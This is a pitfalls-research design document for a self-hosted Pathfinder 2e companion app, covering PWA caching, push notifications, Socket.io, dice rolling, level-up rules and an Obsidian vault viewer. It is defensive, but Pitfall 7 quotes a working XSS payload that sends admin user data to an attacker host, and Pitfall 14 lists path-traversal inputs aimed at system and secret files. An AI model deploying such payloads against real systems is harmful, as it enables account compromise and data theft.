
Pitfalls Research

Domain: Self-hosted PF2e TTRPG companion app — PWA + multi-screen battle + extended Socket.io + Obsidian read-only vault + full PF2e Level-Up
Researched: 2026-04-27
Confidence: HIGH for PWA/Push/Socket.io/Prisma areas (verified via official sources and 2026 docs); HIGH for PF2e rules (verified against Archives of Nethys); MEDIUM for Obsidian-specific markdown traps (community wisdom + forum threads)

This document is opinionated. Pitfalls are grouped by the six active phase buckets (Level-Up, PWA, Battle-Multi-Screen, Dice/Chat, GM-Live-Tools, Obsidian) plus cross-cutting categories (Prisma/Postgres, Socket.io, Mobile-at-the-Table). Each pitfall lists warning signs, prevention, and the phase that owns it.


Critical Pitfalls

Pitfall 1: Service Worker caches an authenticated API response and serves it to the wrong user after logout/re-login

What goes wrong: The service worker caches a /api/characters/:id response as part of an offline-read strategy. User A logs out, user B logs in on the same device (shared GM laptop, same browser profile). User B opens the cached character page and sees user A's character — or worse, user A's JWT-derived data — because the cache key is the URL, not the user identity.

Why it happens: Service worker fetch-handlers cache by request URL by default. They don't know about JWT context. The browser also keeps the service worker alive across login/logout because logout only clears storage, not caches.

How to avoid:

  • Cache only non-sensitive static assets (JS/CSS/icons/manifest) with a network-first or cache-first strategy
  • For authenticated API responses, use IndexedDB keyed by userId (not the SW Cache API), and clear it on logout
  • On logout: explicitly call caches.delete() for every user-scoped cache name. Unregistering the service worker (swReg.unregister()) is overkill; instead send postMessage("LOGOUT") to the SW so it can purge user-scoped data itself
  • Treat any URL containing /api/characters/, /api/campaigns/, /api/battle/ as never cache by URL alone — always wrap in a user-scoped key
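
A minimal sketch of the purge decision, assuming a cache-naming convention (the `app-static-`/`app-user-` prefixes are illustrative, not an existing API — pick your own and keep it consistent between the SW and the logout handler):

```typescript
// Hypothetical naming convention: one shared static cache, one cache per user.
const STATIC_CACHE = "app-static-v1"; // safe to keep across users
const userCacheName = (userId: string) => `app-user-${userId}`;

// Pure helper: given all cache names, pick the ones to delete on logout.
// Purges EVERY user-scoped cache, not just the current user's — a previous
// user's cache may still be on the device.
function cachesToPurgeOnLogout(allCacheNames: string[]): string[] {
  return allCacheNames.filter((name) => name.startsWith("app-user-"));
}

// In the browser, the logout handler would then roughly do:
//   const names = await caches.keys();
//   await Promise.all(cachesToPurgeOnLogout(names).map((n) => caches.delete(n)));
```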

Warning signs:

  • A second logged-in user reports seeing data they shouldn't
  • DevTools → Application → Cache Storage shows entries with sensitive paths after logout
  • Multi-user shared device shows stale data

Phase to address: PWA (the offline-read story has to be designed user-scoped from day one)


Pitfall 2: Service Worker + Socket.io mid-game force-update interrupts an active battle session

What goes wrong: A new SW version deploys mid-session. Default Workbox behavior (skipWaiting() + clients.claim()) reloads tabs, killing the open Socket.io connection on the GM laptop and the table display. Initiative state is in-memory on the client; reconnecting after a forced reload causes flicker, dropped events, or — worst case — the GM has to re-drag tokens because the WebSocket replay didn't catch the missed events.

Why it happens: Devs follow tutorials that recommend skipWaiting() for "instant updates" without considering that some apps (this one) absolutely cannot reload mid-task. Service workers in 2026 still have long default update cycles (24h check) but skipWaiting() short-circuits that to immediate.

How to avoid:

  • NEVER call skipWaiting() automatically. Wait for user action.
  • Show a non-blocking "Neue Version verfügbar — jetzt aktualisieren?" toast/banner. Only reload when the user clicks.
  • During an active battle session, suppress the update prompt entirely until the session is closed. Track active-battle state in a Zustand store; gate the toast on !isInBattle.
  • Use Workbox's ServiceWorkerRegistration.waiting + controllerchange event for the manual flow.
  • Tag SW versions with git SHA so you can correlate "stuck on old version" reports with deploy times.

Warning signs:

  • Players report "it reloaded in the middle of a fight"
  • Multiple SW versions reported in chrome://serviceworker-internals for active users
  • Token positions desync between GM laptop and table display after deploy

Phase to address: PWA (must be designed before the first SW ships — retrofitting "don't update during battle" is hard)


Pitfall 3: iOS Safari PWA push notifications silently fail because the install path or manifest is wrong

What goes wrong: GM sends a "Würfelaufforderung" push to all players. Android players get it. iOS players get nothing. No error, no log entry, just silence. Investigation reveals one of: app wasn't installed via "Add to Home Screen", manifest didn't have "display": "standalone", app was opened from Safari tab not home-screen icon, OR the user is in the EU where iOS PWAs behave differently (Apple has shipped EU-region restrictions).

Why it happens: iOS 16.4+ supports Web Push, but only for PWAs installed to the home screen running in standalone mode. Permission prompts must be triggered by direct user gesture. The manifest requirements are stricter than on Android. EU regulatory changes have caused iOS PWA push to be flaky depending on Safari version and region.

How to avoid:

  • Manifest must include: "display": "standalone", name, short_name, start_url, full icon set including 192x192 and 512x512, maskable icon variant for Android
  • Add an in-app "Install Guide" page targeted at iOS: detect navigator.standalone === false && /iPhone|iPad/.test(navigator.userAgent) and show explicit instructions ("Teilen-Button → Zum Home-Bildschirm")
  • Permission prompt: show only after user taps a deliberate "Benachrichtigungen aktivieren" button — never on first load
  • After permission grant, immediately do a self-test: send a test push from server and confirm receipt in client. If silent, surface a clear error.
  • Document the EU caveat in user-facing help: PWAs in EU may not get push depending on iOS version; recommend Android Chrome or non-EU iOS
  • HTTPS is mandatory — even self-hosted dev needs a valid cert (use mkcert or Let's Encrypt + reverse proxy)

Warning signs:

  • "I didn't get the ping" from one platform but not others
  • Permission shows "denied" or "default" forever after a failed first attempt
  • pushManager.getSubscription() returns null after permission grant

Phase to address: PWA


Pitfall 4: VAPID key gets lost or rotated → all existing push subscriptions silently break

What goes wrong: Server is rebuilt, .env is regenerated, VAPID keys are different. All PushSubscription rows in the DB now point to the old public key. Push sends fail with 401/403, but the player-facing app shows the user as "subscribed". Users wonder why pings stopped working. There is no UI signal because subscriptions appear valid client-side.

Why it happens: VAPID keys are application-server-identity keys. web-push libraries don't refuse to send with mismatched keys until the push service rejects. Devs treat .env as ephemeral and lose the keypair.

How to avoid:

  • VAPID keys are application secrets — back them up like JWT_SECRET. Document explicitly in .env.example that these must be persistent across deploys.
  • Generate them once during initial setup, commit the public key to a build-time constant (or fetch from a stable endpoint), keep the private key server-side only
  • Implement automatic 410-Gone cleanup: on push send, if the push service returns 410, delete that PushSubscription row. Without this, expired subs accumulate and waste send budget.
  • Listen to the pushsubscriptionchange event in the service worker — when the browser rotates a subscription, re-register with the server
  • On startup, log VAPID public key fingerprint so you notice if it changes unexpectedly
  • Never rotate VAPID keys without a migration plan — rotation invalidates every existing subscription and there's no resubscribe-without-permission path
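
The 410-cleanup and key-mismatch cases are easy to conflate, so it helps to centralize the decision. A sketch, assuming the usual push-service status semantics (404/410 = subscription gone, 401/403 = sender auth/VAPID problem); the function name and action labels are hypothetical:

```typescript
type PushSendAction = "ok" | "delete-subscription" | "check-vapid-keys" | "retry-later";

// Map a push-service HTTP status to a cleanup action.
function classifyPushSendStatus(status: number): PushSendAction {
  if (status === 404 || status === 410) return "delete-subscription"; // sub expired/unsubscribed
  if (status === 401 || status === 403) return "check-vapid-keys";    // key mismatch — do NOT delete rows
  if (status === 429 || status >= 500) return "retry-later";          // transient, back off
  return "ok";
}
```

The key distinction: 410 means one subscription is dead; 401/403 across many sends means the server's identity changed — deleting rows there would destroy recoverable subscriptions.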

Warning signs:

  • "Push works but not for older users"
  • 401/403 spike in push send logs
  • PushSubscription row count growing forever (no cleanup)
  • Random subscription fails after browser updates

Phase to address: PWA / GM-Live-Tools


Pitfall 5: Display-mode (table screen) leaks GM-only data because role-checks live in components, not in the data layer

What goes wrong: The display screen reuses the BattleScreen React component with a displayMode prop. The component conditionally hides GM controls. But the WebSocket payload still contains npcStats.hidden = true, nextRoundEnemyAction = "uses healing potion at 30%", GM notes on tokens, hidden token positions (invisible enemies), or full HP values for monsters whose HP should appear as a vague bar. A curious player could open DevTools at the table, look at the WebSocket frames, and see everything.

Why it happens: "It's just a display screen, players can't interact" — but the display screen is on the same network, served by the same socket.io server, often connected with the GM's account or a shared anonymous account. The data filtering happens in render, not in the gateway emit.

How to avoid:

  • Treat the display screen as an untrusted client even though physically it's at the table
  • Server-side: emit two distinct event channels, battle:gm:* and battle:display:*, with the display channel containing only what's safe to show (token positions, public HP bars, initiative order, public conditions)
  • Authenticate the display screen with a separate display-only token issued by the GM (short-lived, scoped to one battle, can't access other endpoints)
  • Display-screen routes server-side must reject attempts to read GM-only fields even with a valid token
  • Add a "Display token" UI: GM clicks "Display starten" → server issues a one-shot token + URL with embedded token → display screen opens that URL → token expires when battle ends
  • Test: open the display URL in incognito, run socket.on("*", console.log), verify no GM data appears in any frame
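
A sketch of the server-side filtering step before emitting on the display channel. Field names (hidden, gmNotes, hpBucket) are illustrative, not the real schema — the point is that GM-only fields never appear in the output type at all:

```typescript
// What the server knows about a token (GM view).
interface BattleToken {
  id: string;
  x: number;
  y: number;
  hp: { current: number; max: number };
  hidden: boolean;   // invisible enemy — players must not know it exists
  gmNotes?: string;  // GM-only annotation
}

// What the display screen is allowed to see. No hp numbers, no notes.
type DisplayToken = {
  id: string;
  x: number;
  y: number;
  hpBucket: "healthy" | "wounded" | "critical";
};

function toDisplayTokens(tokens: BattleToken[]): DisplayToken[] {
  return tokens
    .filter((t) => !t.hidden) // hidden tokens never leave the server
    .map((t) => {
      const ratio = t.hp.current / t.hp.max; // exact HP stays server-side
      return {
        id: t.id,
        x: t.x,
        y: t.y,
        hpBucket: ratio > 0.5 ? "healthy" : ratio > 0.2 ? "wounded" : "critical",
      };
    });
}
```

Emitting `toDisplayTokens(state.tokens)` on battle:display:* makes the DevTools test above pass by construction.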

Warning signs:

  • Display screen URL works after copy-paste from another browser
  • WebSocket frames sent to display include fields the player UI also doesn't render
  • Display screen survives GM logout

Phase to address: Battle-Multi-Screen


Pitfall 6: Client-side dice rolls are tampered/spoofed — players can claim any result

What goes wrong: Player rolls 1d20+7 for a critical save. Client computes the result, emits dice:roll {result: 20, total: 27} over WebSocket. Server broadcasts to chat. Either: (a) a player modifies the JS to always return 20, or (b) a player intercepts the WebSocket frame and edits the value. There's no way to detect cheating after the fact.

Why it happens: Convenience: it's easier to roll on the client and broadcast the result. PF2e crits (rolls of 20 OR results 10+ over DC) and persistent damage rolls feel "natural" to compute locally. Devs forget WebSocket payload is fully attacker-controlled.

How to avoid:

  • All rolls happen server-side. Client emits dice:request {notation: "1d20+7", purpose: "save"}. Server parses, rolls (using crypto.randomInt), persists to RollLog, broadcasts result.
  • Use a tested PF2e-aware notation parser. Required features:
    • Degrees of success (meet or exceed the DC → success; exceed by 10 → critical success; miss by 10 → critical failure; a natural 20 upgrades the degree one step and a natural 1 downgrades it one step — it is NOT a flat "nat 20 = crit" rule)
    • Critical damage doubles the ENTIRE damage, dice AND modifiers: 2d6+4 crits to (2d6+4) × 2, not 4d6+4. Generic parsers frequently apply the 5e rule (double dice only) — wrong for PF2e.
    • Persistent damage (2d6 persistent fire → recurring roll on each turn-end with DC 15 flat-check to remove)
    • Recharge dice for some abilities
    • keep highest, keep lowest, advantage/disadvantage (rare in PF2e but used by some feats)
  • Server stores roll seed + notation + result + roller + timestamp → fully auditable
  • Client-side has a shadow roller for instant feedback while waiting for server roll, but the server result is canonical and replaces the shadow on receipt
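
A sketch of the server-side core: rolling with crypto.randomInt (as named above) and resolving PF2e degrees of success, including the one-step upgrade/downgrade for natural 20/1. Function names are illustrative:

```typescript
import { randomInt } from "node:crypto";

// randomInt's upper bound is exclusive, so a d20 is randomInt(1, 21).
function rollD20(): number {
  return randomInt(1, 21);
}

type Degree = "critFail" | "fail" | "success" | "critSuccess";

function degreeOfSuccess(natural: number, total: number, dc: number): Degree {
  // Base degree from total vs. DC, with the ±10 rule ...
  let idx = total >= dc + 10 ? 3 : total >= dc ? 2 : total <= dc - 10 ? 0 : 1;
  // ... then natural 20 upgrades one step, natural 1 downgrades one step.
  if (natural === 20) idx = Math.min(3, idx + 1);
  if (natural === 1) idx = Math.max(0, idx - 1);
  return (["critFail", "fail", "success", "critSuccess"] as const)[idx];
}
```

Note that a nat 20 on a total 5 below the DC yields a plain success, not a crit — exactly the case generic "nat 20 = crit" parsers get wrong.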

Warning signs:

  • Suspiciously high crit rate from one player
  • Roll log shows results that don't match notation
  • Players asking to "edit" their roll

Phase to address: Dice/Chat


Pitfall 7: Markdown chat messages enable XSS via raw HTML or javascript: URLs

What goes wrong: Chat supports markdown for formatting (bold, italics, links to roll results). A malicious or compromised player sends <img src=x onerror="fetch('/api/admin/users', {credentials:'include'}).then(r=>r.json()).then(d=>fetch('https://attacker.example/'+btoa(JSON.stringify(d))))">. The GM (admin) renders the message and runs the script in their session, leaking user data. Or a [click](javascript:...) markdown link that fires on click.

Why it happens: Devs use dangerouslySetInnerHTML with marked/markdown-it because it's easy. Or they use react-markdown but enable rehype-raw without rehype-sanitize because they want HTML inside markdown. Or they don't filter the URL protocols on links.

How to avoid:

  • Use react-markdown without rehype-raw for chat. Markdown → React elements directly, no dangerouslySetInnerHTML, no raw HTML.
  • Restrict allowed elements: allowedElements={['p','strong','em','code','pre','a','ul','ol','li','blockquote']}. No img, no iframe, no script, no style.
  • urlTransform to enforce protocol whitelist: only allow http:, https:, and internal route paths. Block javascript:, data:, vbscript:.
  • Server-side: validate message length (max ~2000 chars), strip control characters, refuse messages with HTML tags before storage. Defense in depth.
  • For roll embeds in chat (the killer feature), use a custom React component slot, not raw HTML — [[roll:abc123]] token that the renderer expands into a <RollResult> component fetching from server state.
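
A minimal sketch of the protocol whitelist, shaped like react-markdown's urlTransform hook (return the URL to keep it, an empty string to drop it); the exact allow-list is an assumption to adapt:

```typescript
// Allow http(s) and app-internal route paths; drop everything else
// (javascript:, data:, vbscript:, protocol-relative //host, garbled input).
function safeUrlTransform(url: string): string {
  if (url.startsWith("/") && !url.startsWith("//")) return url; // internal route
  try {
    const parsed = new URL(url);
    return parsed.protocol === "http:" || parsed.protocol === "https:" ? url : "";
  } catch {
    return ""; // relative or unparseable URLs: drop rather than guess
  }
}
```

Passed as `urlTransform={safeUrlTransform}`, this covers links AND autolinks in one place instead of scattering regex checks through message handling.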

Warning signs:

  • Any use of dangerouslySetInnerHTML in chat code
  • rehype-raw in the markdown pipeline without rehype-sanitize
  • Allowing img or a target="_blank" without rel="noopener noreferrer"

Phase to address: Dice/Chat


Pitfall 8: PF2e Level-Up — boost rules at-18 cap silently break ability scores

What goes wrong: Character has STR 18 at level 4. At level 5, four boosts must be allocated to four different attributes. UI lets player apply a boost to STR. Code adds +2 (because that's the standard boost) → STR 20. Wrong. Per the rules, a boost on a stat already 18 or higher adds only +1, not +2. The character's whole sheet is now overpowered. If the bug goes unnoticed for several levels, recomputing is expensive (every save/skill/AC was wrong from then on).

Why it happens: "Boost = +2" is the simple version. The +1 above 18 rule is easy to miss. Pathbuilder handles it, so devs comparing in-app to Pathbuilder don't notice for a while.

How to avoid:

  • Centralize the boost computation in a applyAttributeBoost(currentValue): number function. Single source of truth: currentValue >= 18 ? +1 : +2. Test it.
  • Validate boosts as a set, not individually. A "level 5 boost set" must apply to four different attributes. UI should grey out already-boosted attributes.
  • For each level-up, persist the decision (which 4 attributes) AND the resulting value, not just the value. Lets you replay/audit.
  • Edge cases to test:
    • All four boosts applied to attributes already at 18 → all +1
    • One boost applied twice in same set (forbidden — must be different attributes)
    • Free Archetype variant rule (no extra boosts, but interacts with feats)
    • Pathbuilder import of an already-leveled character: trust their values for prior levels, only validate from current level forward
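
The two rules above — the 18-cap and the four-different-attributes constraint — fit in a few lines. A sketch of the single source of truth (names are illustrative):

```typescript
// Partial-boost rule: +2 below 18, +1 at 18 or higher.
function applyAttributeBoost(current: number): number {
  return current >= 18 ? current + 1 : current + 2;
}

// A level-up boost set is valid only if it names four DIFFERENT attributes.
function isValidBoostSet(attrs: string[]): boolean {
  return attrs.length === 4 && new Set(attrs).size === 4;
}
```

Keeping both behind one module (and testing them) is what prevents the "+2 everywhere" shortcut from creeping into new level-up UI code.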

Warning signs:

  • Character sheet shows attribute > 18 at level 5 without the +1 cap
  • Boost UI lets you click STR twice in same boost set
  • Differs from Pathbuilder result for the same character

Phase to address: Level-Up


Pitfall 9: PF2e Level-Up — recompute side effects (HP cap, AC, saves) corrupt current state

What goes wrong: Character is at HP 12/40 (badly wounded). Player levels up: CON boost increases HP-Max from 40 → 50. App correctly updates hp.max = 50 but also bumps hp.current = 50 ("you healed!"). Clamping via hp.current = min(hp.current, hp.max) keeps the value at 12, which is fine — but an app that applies the delta instead (hp.current += newMax - oldMax) would, on a CON decrease from retraining, silently push current HP to 0 or below.

Worse: proficiency increase from Trained → Expert at level 3 changes save bonuses. App recomputes the +N modifier but doesn't apply it to the in-flight damageReceived calculation if combat is active.

Why it happens: Level-up touches HP, AC, saves, perception, skills, attacks. Every one of those has a "current" value and a "max/computed" value. Devs change the formula without thinking through the cap/floor invariants.

How to avoid:

  • Level-up commits in a Prisma transaction. All recomputed fields written atomically.
  • HP rule: on HP-Max increase, current does NOT change (player gets new room to heal). On HP-Max decrease (rare, undo case), current is min(current, newMax). Document this rule in code.
  • Level-up CANNOT happen during an active battle session — gate it. PF2e level-ups happen during downtime/rest, never mid-fight.
  • After commit, broadcast a single character:level-up:complete event with the full new sheet, not a sequence of small updates (avoids inconsistent intermediate states broadcast to other clients).
  • Test scenario: character at 0 HP with Dying 2 levels up (edge case for raise-dead-then-level mid-session) — must not silently kill the character or remove Dying.
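
The HP rule above, written down once so it cannot be re-derived differently in each caller (a sketch; the function name is illustrative):

```typescript
// On HP-Max change: an increase leaves current untouched (no free healing);
// a decrease (retrain/undo) clamps current into [0, newMax].
function hpCurrentAfterMaxChange(current: number, newMax: number): number {
  return Math.min(Math.max(current, 0), newMax);
}
```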

Warning signs:

  • HP fully refilled after level-up (should keep the player's current value)
  • Save modifiers don't update after proficiency increase
  • Conditions disappear after level-up

Phase to address: Level-Up


Pitfall 10: PF2e Level-Up — undo/retrain creates orphaned feat dependencies

What goes wrong: Player retrains a level-2 class feat (per the retraining rules). The retired feat was a prerequisite for a level-6 feat the player still has. The level-6 feat now violates its prereq but stays on the sheet. Or: archetype dedication retrained, but the player still has 2 archetype feats pointing to that archetype, in violation of the "must take 2 feats from archetype before another dedication" rule.

Why it happens: Feats are stored as a flat list. Prerequisites are checked at acquisition time, not as an invariant. Removing a feat doesn't trigger re-validation of dependent feats.

How to avoid:

  • Model feats with explicit prerequisites: FeatId[] graph
  • On any feat removal (retrain, undo level-up, archetype change), run a transitive-closure check: any remaining feat whose prereqs are now unmet must be flagged
  • Don't auto-remove dependent feats — surface a "Diese Talente verlieren ihre Voraussetzung" warning and force the player to choose: retrain those too, or block the retrain
  • Archetype invariants:
    • Cannot take a 2nd archetype dedication until 2 non-dedication feats from the 1st archetype are taken
    • With Free Archetype variant, dedication taken at level 1 may have no valid feat at level 2 (all archetype feats are usually level 4+) — surface this as a known gap, allow temporary placeholder
    • Must be prevented: dedication-spam (taking 4 dedications in a row, breaking RAW)
  • Persist level-up history as an append-only log so undo means "create an inverse entry", not destructive update
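
A sketch of the transitive-closure check: given the feats remaining after a retrain, flag every feat whose prerequisite chain is broken, including indirectly (removing A orphans B, which orphans C). Types and names are illustrative:

```typescript
interface Feat {
  id: string;
  prereqs: string[]; // FeatIds this feat requires
}

// Returns the ids of feats whose prereqs are missing or themselves orphaned.
function findOrphanedFeats(feats: Feat[]): string[] {
  const present = new Set(feats.map((f) => f.id));
  const orphaned = new Set<string>();
  let changed = true;
  while (changed) { // fixpoint over the dependency graph
    changed = false;
    for (const f of feats) {
      if (orphaned.has(f.id)) continue;
      if (f.prereqs.some((p) => !present.has(p) || orphaned.has(p))) {
        orphaned.add(f.id);
        changed = true;
      }
    }
  }
  return [...orphaned];
}
```

The result feeds the "Diese Talente verlieren ihre Voraussetzung" warning — flagged feats are surfaced, never auto-removed.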

Warning signs:

  • Character has feats whose prereq feat is missing
  • Two archetype dedications without 2 feats from the first archetype between them
  • Undo of level-N corrupts data at level-(N+1)

Phase to address: Level-Up


Pitfall 11: PF2e Level-Up — skill increase tracking forgets which skills were already increased at which level

What goes wrong: Player has Trained in Athletics at level 1, increases to Expert at level 3, Master at level 7, Legendary at level 15. App stores athletics.proficiency = "legendary" only. At level 20, player wants to undo the level-15 increase. App doesn't know which skill was the level-15 choice — has to guess or block all undo.

Why it happens: Final value is what's displayed on the sheet, so devs only persist the final value. The history of increases is implicit ("must have been at level 15 because legendary") which fails when multiple skills are at the same rank.

How to avoid:

  • Persist SkillIncreaseHistory as (characterId, skillId, level, fromRank, toRank) rows
  • On any skill query, current rank = sum of increases up to current level
  • This also makes the rank-gates trivial to enforce: at levels 3-6, only Trained→Expert. At 7+, also Expert→Master. At 15+, also Master→Legendary.
  • Pathbuilder import: synthesize history rows when possible (Pathbuilder export contains ranks per level), otherwise create one row per current rank with level = currentLevel (lossy but at least consistent)
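
A sketch of deriving the current rank from the history rows described above (row shape and names are illustrative):

```typescript
const RANKS = ["untrained", "trained", "expert", "master", "legendary"] as const;
type Rank = (typeof RANKS)[number];

interface SkillIncrease {
  skillId: string;
  level: number; // level at which the increase was taken
  toRank: Rank;
}

// Current rank = the latest increase at or below the queried level.
function currentRank(history: SkillIncrease[], skillId: string, atLevel: number): Rank {
  const relevant = history
    .filter((h) => h.skillId === skillId && h.level <= atLevel)
    .sort((a, b) => a.level - b.level);
  return relevant.length ? relevant[relevant.length - 1].toRank : "untrained";
}
```

Undo of the level-15 increase then means deleting (or inverse-logging) one row — no guessing which skill it was.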

Warning signs:

  • Level-up UI lets player increase a skill they already increased this level
  • Undo of level-N skill increase requires guessing which skill
  • Imported character has different ranks than Pathbuilder

Phase to address: Level-Up


Pitfall 12: Obsidian wikilink resolution picks the wrong note when basenames collide

What goes wrong: Vault has Characters/Aldrin.md and NPCs/Aldrin.md. A note links [[Aldrin]]. App's resolver picks the first match (alphabetical, by depth, or by a path heuristic). Sometimes it picks Characters/Aldrin, sometimes NPCs/Aldrin, depending on file order returned by the filesystem. Player following the link gets the wrong character page. Indexing performance also varies.

Why it happens: Obsidian uses a "shortest path that's still unique" rule. When multiple notes have the same basename, the rule does NOT pick the first match — it falls back to absolute path. Naive resolvers don't replicate this.

How to avoid:

  • Implement Obsidian's resolution algorithm faithfully:
    1. Exact match on the link text ([[Folder/Name]]) → resolve to that path
    2. Otherwise, basename match: if exactly one file in the vault has that basename, use it
    3. If multiple files share the basename, the link is ambiguous → either error out, render as [[Aldrin (mehrdeutig)]] with a tooltip listing matches, or use the link's containing-folder context
  • Build a basename index at vault-load time: Map<basename, fullPath[]>. Detect ambiguity in O(1).
  • Cache the index, invalidate when the vault changes (mtime check or webhook from the vault server)
  • Surface ambiguity to the user — a vault read-only browser that silently picks wrong is worse than one that says "ambiguous, choose one"
  • Don't follow Obsidian's "shortest path possible" link-creation default unless you also implement its conflict UI; pick a deterministic tie-breaker (alphabetical full path) and document it
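
The resolution order above as a sketch over the precomputed indexes (type names and index shapes are illustrative):

```typescript
type Resolution =
  | { kind: "resolved"; path: string }
  | { kind: "ambiguous"; candidates: string[] }
  | { kind: "missing" };

function resolveWikilink(
  link: string,
  byPath: Set<string>,              // full paths without .md, e.g. "NPCs/Aldrin"
  byBasename: Map<string, string[]> // basename -> all full paths with that name
): Resolution {
  // 1. Exact path match ([[Folder/Name]]) wins outright.
  if (byPath.has(link)) return { kind: "resolved", path: link };
  // 2. Unique basename match.
  const matches = byBasename.get(link) ?? [];
  if (matches.length === 1) return { kind: "resolved", path: matches[0] };
  // 3. Ambiguous or missing — surface it, never guess silently.
  if (matches.length > 1) return { kind: "ambiguous", candidates: matches };
  return { kind: "missing" };
}
```

The "ambiguous" arm is what drives the [[Aldrin (mehrdeutig)]] rendering with the candidate list.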

Warning signs:

  • Same wikilink resolves differently on different vault reads
  • Two notes with the same basename and link target unclear
  • Performance regression in resolver as vault grows

Phase to address: Obsidian


Pitfall 13: Obsidian embed loops cause stack overflow / infinite render

What goes wrong: A.md contains ![[B]] (embed B). B.md contains ![[A]]. Naive recursive renderer expands forever, eventually crashing the tab or hanging the server depending on where rendering happens.

Why it happens: Embeds are recursive by design. Devs implement them as straight recursion without cycle detection.

How to avoid:

  • Maintain a per-render Set<resolvedPath> of already-being-rendered notes. Before recursing into an embed, check if path is in the set. If yes, render [Eingebettete Note: {name} (Zyklus)] placeholder.
  • Hard cap embed depth at 3-4 levels even in non-cyclic cases (deeply nested embeds are user error)
  • Render server-side OR limit client-side embed expansion to one level (Obsidian itself doesn't recursively expand more than one level on first render)
  • Test with a known-cyclic vault before shipping
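
A sketch of cycle-safe, depth-capped expansion over an in-memory vault (the placeholder strings match the German UI text above; the simple `![[...]]` regex is a stand-in for a real parser):

```typescript
const MAX_EMBED_DEPTH = 3;

function renderNote(
  path: string,
  vault: Map<string, string>,      // path -> raw markdown
  active: Set<string> = new Set(), // notes currently on the render stack
  depth = 0
): string {
  if (active.has(path)) return `[Eingebettete Note: ${path} (Zyklus)]`;
  if (depth > MAX_EMBED_DEPTH) return `[Eingebettete Note: ${path} (zu tief)]`;
  const raw = vault.get(path) ?? `[fehlende Note: ${path}]`;
  active.add(path);
  const out = raw.replace(/!\[\[([^\]]+)\]\]/g, (_, target: string) =>
    renderNote(target, vault, active, depth + 1)
  );
  active.delete(path); // allow the same note again in sibling branches
  return out;
}
```

Using a render-stack set (added before recursing, removed after) rather than a global "seen" set means A embedded twice in non-cyclic positions still renders both times.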

Warning signs:

  • Page hangs on certain notes
  • Server CPU spike on vault read of specific files
  • Stack overflow errors in renderer

Phase to address: Obsidian


Pitfall 14: Vault path traversal allows reading files outside the vault root

What goes wrong: Vault server endpoint accepts ?path=../../etc/passwd or ?path=Notes/../../../server.env. Naive path joining (vaultRoot + userInput) followed by fs.readFile reads any file the server process can access.

Why it happens: Server devs forget that wikilinks come from user-controlled markdown content, not just direct API calls. Even reading-only is dangerous if the read can target sensitive files.

How to avoid:

  • Resolve the requested path with path.resolve(vaultRoot, userPath)
  • Verify the resolved absolute path starts with vaultRoot + path.sep — reject otherwise
  • Refuse any path containing .., null bytes (%00), or symlinks pointing outside the vault
  • Whitelist file extensions: .md, .png, .jpg, .jpeg, .gif, .webp, .svg, .pdf. Reject everything else.
  • Authenticate the vault endpoint with the same JWT as the rest of the API
  • On Windows, also reject paths containing : or device names (CON, PRN, NUL, AUX, COM1-COM9, LPT1-LPT9) — can be used for device-name attacks
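
A sketch of the resolve-then-verify containment check (symlink handling still needs fs.realpath on the result, omitted here; the function name is illustrative):

```typescript
import * as path from "node:path";

// Canonicalize the requested path and verify it stays inside the vault.
// Returns the safe absolute path, or null if the request must be rejected.
function resolveVaultPath(vaultRoot: string, userPath: string): string | null {
  if (userPath.includes("\0")) return null; // null-byte tricks
  const root = path.resolve(vaultRoot);
  const resolved = path.resolve(root, userPath);
  // Containment check: the resolved path is the root itself or below it.
  if (resolved !== root && !resolved.startsWith(root + path.sep)) return null;
  return resolved;
}
```

Note this intentionally does NOT try to strip ".." from the input — path.resolve handles traversal sequences and absolute inputs, and the startsWith check catches both.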

Warning signs:

  • Vault endpoint accepts arbitrary path strings without validation
  • Resolved path doesn't get normalized before access
  • Tests don't cover .., symlinks, or absolute paths

Phase to address: Obsidian


Pitfall 15: Socket.io message ordering breaks on reconnect; Connection State Recovery not enabled

What goes wrong: Player loses Wi-Fi for 5 seconds during battle. GM updates 3 token positions during that gap. On reconnect, player sees only the latest token position emitted after reconnect — the 3 missed updates are lost. Or worse, a chat message sent during the gap never arrives, and there's no indication of loss.

Why it happens: Default Socket.io reconnects but does NOT replay missed events unless Connection State Recovery (CSR) is explicitly enabled. Even with CSR, the recovery window is short (default 2 minutes) and the adapter must support it.

How to avoid:

  • Enable Connection State Recovery on the server: io({connectionStateRecovery: {maxDisconnectionDuration: 2 * 60 * 1000, skipMiddlewares: true}})
  • For events that must not be lost (chat messages, dice rolls, GM-pings), use the retries option on emit: socket.emit(event, payload, {retries: 3}) and require server ack
  • For state-sync events (HP, token position), don't worry about replay — instead, on reconnect, re-fetch the current state via REST and reconcile. WebSocket events are the live update channel; REST is the source of truth.
  • Persist chat and rolls to Postgres immediately on receipt, broadcast as a notification only. On reconnect, client refetches since=lastSeenId from REST.
  • Acknowledge important events: server emits chat:new with a callback; client invokes the callback to confirm receipt; server retries N times if no ack within timeout.
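
A sketch of the reconnect reconciliation: merge what arrived over the socket with the REST refetch (since=lastSeenId), deduplicating by id and treating the server copy as canonical. The message shape is illustrative; a monotonically increasing server id is assumed:

```typescript
interface ChatMsg {
  id: number; // server-assigned, monotonically increasing
  text: string;
}

function reconcileChat(local: ChatMsg[], fetchedSinceLastSeen: ChatMsg[]): ChatMsg[] {
  const byId = new Map<number, ChatMsg>();
  // Insert local first, then fetched — the server copy overwrites on id collision.
  for (const m of [...local, ...fetchedSinceLastSeen]) byId.set(m.id, m);
  return [...byId.values()].sort((a, b) => a.id - b.id);
}
```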

Warning signs:

  • "I missed the GM's message" reports
  • Token positions desync between clients
  • Chat history has gaps after a reconnect
  • No ack-tracking on critical events

Phase to address: Battle-Multi-Screen, Dice/Chat (cross-cutting WebSocket area)


Moderate Pitfalls

Pitfall 16: Cascading deletes wipe historical data unintentionally

What goes wrong: GM deletes an old battle session for cleanup. With onDelete: Cascade on BattleSession → RollLog, all roll history from that battle is gone. Players lose their historic crits. Or: campaign deletion cascades to characters, characters cascade to rolls — entire user history vanishes.

Why it happens: Devs default to Cascade because "clean up automatically". Don't think about which children are historical records vs transient state.

How to avoid:

  • Decide per-relation: is the child dependent state (token positions only meaningful inside their battle → Cascade) or historical record (rolls/chat are part of campaign history → Restrict or SetNull with archivedAt)?
  • Soft-delete (deletedAt: DateTime?) for top-level entities (Campaign, BattleSession) so accidents are recoverable
  • For PushSubscription: Cascade on User delete (no orphan subs)
  • For RollLog/ChatMessage: NoAction on User delete (preserve history; show "Spieler entfernt" instead of name); soft-delete the user
  • For BattleEffect: Cascade on token delete (effect is a property of the token)
  • Document each onDelete in a comment in schema.prisma

Warning signs:

  • Deleting a parent unexpectedly nukes lots of child rows
  • Migration introduces Cascade on a relation that previously had Restrict
